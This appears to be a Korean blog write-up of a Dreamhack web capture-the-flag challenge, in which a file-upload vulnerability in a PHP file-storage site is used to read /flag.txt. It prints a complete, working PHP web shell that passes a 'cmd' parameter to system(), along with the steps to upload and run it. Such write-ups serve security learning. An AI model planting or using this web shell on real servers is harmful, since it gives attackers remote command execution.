반응형
문제 설명
해당 문제는 php로 제작된 파일 저장 사이트를 파일업로드 취약점을 이용하여 /flag.txt 파일의 내용을 읽는 문제이다.
php로 제작한 웹쉘을 해당 서버에 업로드한다.
파일 업로드를 완료하면 파일 업로드된 경로를 노출하고 있다. 해당 경로에 접속하여 웹 쉘을 실행할 수 있다.
웹 쉘에 접근하여 cat /flag.txt 명령어를 입력하면 flag값을 얻을 수 있다.
php 웹쉘 코드
<html>
<body>
<form method="GET" action="" >
<input type="text" name="cmd">
<input type="submit">
</form>
<?php
if(isset($_GET["cmd"])){
system($_GET["cmd"]);
}
?>
</body>
</html>
반응형
'WEB hacking > 드림핵(dreamhack)' 카테고리의 다른 글
드림핵 web-ssrf Write Up (0) | 2023.08.09 |
---|---|
드림핵 file-download-1 Write Up (0) | 2023.08.07 |
드림핵 command-injection-1 Write Up (0) | 2023.07.15 |
드림핵 simple_sqli Write Up (0) | 2023.06.20 |
드림핵 simple-web-request Write Up (0) | 2023.04.24 |